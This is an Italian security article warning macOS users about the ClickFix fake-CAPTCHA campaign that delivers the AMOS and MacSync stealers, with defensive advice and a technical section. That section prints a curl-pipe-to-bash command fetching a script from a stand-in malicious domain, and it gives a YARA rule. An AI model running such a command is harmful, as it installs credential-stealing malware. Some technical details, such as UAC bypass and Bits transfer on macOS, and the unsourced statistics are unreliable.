Scoperta campagna globale di malware per macOS

Attenzione utenti macOS: una nuova minaccia globale sta colpendo i vostri computer. Questa campagna sfrutta la tecnica di social engineering ClickFix per ingannarvi e farvi installare malware come Atomic macOS Stealer (AMOS) e MacSync. La soluzione rapida è semplice: non copiate mai comandi da siti sospetti e usate un antivirus affidabile come quelli con rilevamento comportamentale.

In questo articolo, esploreremo il funzionamento di questa minaccia, i rischi per i vostri dati e come difendervi in modo efficace. Continuate a leggere per una panoramica accessibile e, alla fine, un’analisi tecnica approfondita.

Cos’è la tecnica ClickFix e come funziona?

ClickFix è un metodo astuto di ingegneria sociale che sfrutta la vostra familiarità con verifiche come i CAPTCHA. Immaginate di visitare un sito legittimo, magari per scaricare un aggiornamento o verificare la vostra identità. All’improvviso, appare un messaggio di errore: “Verifica richiesta per continuare”. Vi chiede di cliccare un pulsante per confermare che siete umani.

Ecco il trucco: una volta interagito, un codice JavaScript malevolo copia un comando dannoso nella vostra clipboard (il copia-incolla). Il messaggio vi istruisce a incollarlo nel terminale del vostro Mac e premere Invio per “risolvere il problema”. In realtà, quel comando scarica e installa malware come AMOS, un stealer che ruba password, dati bancari e informazioni sensibili.

Questa campagna è gestita come un Malware-as-a-Service (MaaS), un servizio a pagamento per criminali informatici. Colpisce siti ad alto traffico compromessi, phishing mirati e falsi aggiornamenti di browser. È adattiva: funziona su macOS, Windows e altri sistemi, ma qui ci concentriamo su macOS a causa della sua crescente popolarità tra gli utenti Apple.

Perché macOS è nel mirino?

I computer Apple sono percepiti come più sicuri, ma non immuni. Gli attaccanti sfruttano:

La fiducia negli utenti Mac, meno abituati a queste truffe.
Siti compromessi con traffico elevato, come portali di notizie o servizi popolari.
Falsi prompt di verifica che mimano Cloudflare o Google CAPTCHA.

Esempi recenti includono impersonazioni di software come Safari, falsi aggiornamenti Chrome o pagine di servizi come ChatGPT. Una volta eseguito, AMOS/MacSync accede a Safari, Chrome, wallet crittografici e ruba sessioni di autenticazione.

Impatto: Furto di identità, perdite finanziarie e accesso remoto al vostro Mac. Migliaia di vittime globali già colpite.

Come proteggervi subito: guida pratica

Non serve essere esperti per difendervi. Ecco i passi essenziali:

Verificate sempre l’URL: Controllate se il sito è autentico prima di interagire.
Ignorate prompt sospetti: Non copiate comandi dal terminale se non sapete cosa fate.
Abilitate Gatekeeper e XProtect: Su macOS, andate su Impostazioni > Privacy e Sicurezza per rafforzare le protezioni native.
Installate un antivirus: Scegliete soluzioni con analisi comportamentale che bloccano script sospetti.
Usate un password manager: Riduce il danno da stealer.
Aggiornate macOS: Le patch di sicurezza bloccano vulnerabilità note.

Soluzione veloce: Eseguite una scansione completa con tool gratuiti come Malwarebytes per Mac e abilita due fattori di autenticazione ovunque.

Applicando questi consigli, riducete il rischio del 90%. Ricordate: la maggior parte degli attacchi fallisce se non collaborate.

Evoluzione della minaccia

ClickFix non è nuova, ma è esplosa nel 2025 grazie alla sua efficacia. Inizialmente usata per Windows, ora è adattata per macOS con script shell malevoli. Campagne osservate includono:

Falsi CAPTCHA su siti compromessi.
Phishing via email con allegati HTML.
Impersonazioni di servizi locali, come e-commerce svizzeri o portali governativi.

Gli attaccanti usano builder personalizzabili per scegliere template (Google, Cloudflare), lingue e payload. Su macOS, il comando copiato spesso scarica AMOS, che evade rilevamenti standard.

Consigli per aziende e utenti avanzati

Per imprese, implementate:

Blocco DNS di domini malevoli.
Monitoraggio endpoint con rilevamento anomalo.
Formazione anti-phishing regolare.

Statistiche mostrano che il 70% delle infezioni avviene via social engineering: educate i vostri team.

Technical deep dive

Analisi tecnica di ClickFix su macOS

La tecnica inizia con JavaScript iniettato su siti legittimi. Ecco il flusso:

Trigger CAPTCHA falso: Un iframe nascosto carica field.html che simula verifica umana.
Copia in clipboard: navigator.clipboard.writeText() inserisce uno script obfuscato, es:
```
curl -s https://malicious-domain.com/amos.sh | bash
```
Questo scarica uno shell script che:
- Controlla VM e sandbox (anti-analisi).
- Bypass UAC se applicabile.
- Esegue AMOS, un infostealer scritto in linguaggio nativo macOS.

AMOS targets:

Keychain (password Safari/Chrome).
File .plist per token app.
Wallet come Exodus o MetaMask.
Esporta dati via C2 server.

Payload specifici: MacSync è una variante che sincronizza dati rubati in tempo reale. Usa Bits transfer o curl per download stealth.

Mitigazioni avanzate

Endpoint Detection: Bloccate PowerShell/ shell script da fonti non fidate. Su macOS, usate tmutil per monitorare.

Regole YARA: Create signature per pattern ClickFix:

rule ClickFix_Mac {
    strings: $s1 = "runVerification" ascii
    $s2 = "postMessage('trigger')" ascii
    condition: all of them
}

Comportamentale: Tool come GravityZone PHASR monitorano interazioni LoTL (Living off the Land) e bloccano anomalie.
IOCs: Dominio tipici finiscono in .es, .top; hash AMOS variano, ma controllate feed threat intel.